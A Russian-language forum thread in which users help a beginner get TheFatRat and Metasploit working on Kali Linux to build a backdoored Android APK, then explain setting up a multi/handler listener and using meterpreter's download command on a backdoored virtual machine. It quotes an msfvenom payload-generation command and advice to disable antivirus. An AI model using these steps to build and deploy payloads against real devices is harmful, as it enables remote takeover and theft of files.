• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

Помогите разобраться пожалуйста kali linux metasploit

CrazyMan

Active member
06.07.2020
27
0
BIT
0
Всем доброго времени суток. Помогите разобраться пожалуйста. На VirtualBox установлена Kali linux 2020.2 (всё с официальных сайтов)
Хотел протестить свой телефон при помощи FatRat вроде бы всё делал по прочитанной инструкции. но на выходе всегда одна и тажа ошибка связанная с Metasploit (скрины прилагаются) Вопрос: что я делаю не так? Где ошибка?
Нужно ли настраивать саму "машину" при этом если да то как? И такой вопрос нужно ли пользоваться VPN? если не обязательно, то какой мне порт прописывать? Помогите один раз грамотно разобраться пожалуйста...

Вложения

• 1.jpg
    1.jpg
    36 КБ · Просмотры: 343
  • 2.jpg
    2.jpg
    61,7 КБ · Просмотры: 338
  • 3.jpg
    3.jpg
    16 КБ · Просмотры: 316
Что мне нужно сделать для того чтоб всё перенести?
(как правильно это сделать)
И как сделать чтоб был английский а не русский?
И что дальше?
Выполни команды
Код:
cd 'Рабочий стол'
mv ./TheFatRat ../
cd ../TheFatRat
sudo ./fatrat

Таким образом ты перенесёшь директорию TheFatRat в /home/adminus и мы исключим воздействие кириллицы и пробелов при исполении скрипта.

Если не поможет, будем капать дальше

Могу зайти как root пробовал запускать fatrat не всё тоже самое
Антивирус работает
я не знаю как показать строку 2238 которую ты попросил
Ненужно, глянул уже на git-e, вообщем попробуй отключить антиврус и запустить от рута... лучше перед эти для чистоты эксперимента перезагрузись)
Насколько я понял после работы msfvenom весь его stdout кидается в файлик логов.. и вот этот файл не получается создать/открыть/найти
Код:
$msfvenom -f raw -p $payload LHOST=$yourip LPORT=$yourport -o $output/$fira.apk >>$log /dev/null 2>&1

Выполни команды
Код:
cd 'Рабочий стол'
mv ./TheFatRat ../
cd ../TheFatRat
sudo ./fatrat

Таким образом ты перенесёшь директорию TheFatRat в /home/adminus и мы исключим воздействие кириллицы и пробелов при исполении скрипта.

сейчас всё попробую. спасибо. отпишусь сразу

Ненужно, глянул уже на git-e, вообщем попробуй отключить антиврус и запустить от рута... лучше перед эти для чистоты эксперимента перезагрузись)
Насколько я понял после работы msfvenom весь его stdout кидается в файлик логов.. и вот этот файл не получается создать/открыть/найти
Код:
$msfvenom -f raw -p $payload LHOST=$yourip LPORT=$yourport -o $output/$fira.apk >>$log /dev/null 2>&1

спасибо сейчас попробую первый вариант и потом твой если не получиться

Код:
Да, в скрипте на 156 строке указано куда логи будут грузиться
log="${path}/logs/apk-old.log"

Выполни команды
Код:
cd 'Рабочий стол'
mv ./TheFatRat ../
cd ../TheFatRat
sudo ./fatrat

я перенес вс как ты написал. вот что теперь запускается

Вложения

• 11.jpg
    11.jpg
    33,2 КБ · Просмотры: 204
Рубят всё получилось спасибо большое. apk создал на свой телефон бросил, только вот у меня телефон оказался умнее и сразу распознал вирус)))
всё равно установил и появился значок приложения вот только опять же телефон написал что данное приложение создано для более старых моделей и у Вас работать будет с перебоями. так и вышло. соответственно и сессию я запустить тоже не смог(((
А где мне научиться создавать такие apk файл скажем современные))))
для современных телефонов.

Рубят всё получилось спасибо большое. apk создал на свой телефон бросил, только вот у меня телефон оказался умнее и сразу распознал вирус)))
всё равно установил и появился значок приложения вот только опять же телефон написал что данное приложение создано для более старых моделей и у Вас работать будет с перебоями. так и вышло. соответственно и сессию я запустить тоже не смог(((
А где мне научиться создавать такие apk файл скажем современные))))
для современных телефонов.
В итоге твой вопрос решился переносом всей директории в /home, установки недостающих модулей и запуска от root?

На счёт работать с перебоями не факт.
Ты запустил в metasploit слушателя?
И есть ли у тебя связь между телефоном и твоей машиной?

В итоге твой вопрос решился переносом всей директории в /home, установки недостающих модулей и запуска от root?

ну смотри само приложение на телефон установил но оно не как не активно. просто ярлык который пустой и не открывается))))
Ты запустил в metasploit слушателя? Да но сессия то не рабочая так как на телефоне приложения я не запускаю (не могу)
А вот третий вопрос я твой не понял на счёт связи(((((((
то что я сделал apk я уже этому очень рад.

как бы мне теперь научиться на таком же примере с этим же смыслом ссылки делать?

Да БЛАГОДАРЯ ВАМ!!!

Помоги мне пожалуйста с вот этим

Enable HTTP request and response logging with set HttpTrace true
как мне включить эти журналы?(

На твоей машине надо запустить метаслоит, выбрать тот же пейлоад, настроить multi handler и указать тот же порт, что ты использовал при создании apk.
Далее тебе нужно убедится, что между твоим телефоном и машиной с запущенным метасплоитом есть линк (самое простое дляттестов - они должны находится в одной сети). Иначе программа не сможет установить связь с метасплоитом.

Судя по твоим вопросам ты только начинаешь разбираться с метасплоитом, да и в линуксе опыта работы у тебя нет.

Начни с базовых навыков, разберись как работать в терминале линукса, как работают сети.
Потом переходи к тестам на виртуалках. Подними виртуалку с Kali и с Windows и на них изучай как работают пейлоады, какие типы соединений бывают и прочее.

Читай и смотри ролики на английском, там зачастую все стандартные вопросы и ошибки уже решены и объяснены.

Ну и Kali ставь сразу английскую, как ты заметил косяки с кириллицей бывают очень часто.

На твой последний вопрос ответить не могу. Понятие не имею откуда ты взял эти параметры и как их настраивать. Закрывай эту тему (выбери пост который решил твою проблему) и открывай новую. Главное сразу указывай все шаги, которые приводят тебя к проблеме, иначе тратится куча времени на вытягивание недостающей информации.

Всем привет! создал backdoor на виртульную машину .. показывает спиок файлов, делайт скриншоты...но как скачивать файлы ??? при вводе cp ....
stdapi_fs_file_copy: Operation failed: Access is denied.

Вложения

• Снимок экрана_2020-07-24_15-59-55.png
    Снимок экрана_2020-07-24_15-59-55.png
    146,1 КБ · Просмотры: 184
Всем привет! создал backdoor на виртульную машину .. показывает спиок файлов, делайт скриншоты...но как скачивать файлы ??? при вводе cp ....
stdapi_fs_file_copy: Operation failed: Access is denied.
cp команда копирования, которая будет выполняется на атакуемой машине.
Для скачивания есть команда download
Воь прекрасная статья каа работает метерпретер, да и вообще о работе метасплоита от разработчиков метасплоита

Ну и на будущее лучше создавать отдельную тему под свою проблему

Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!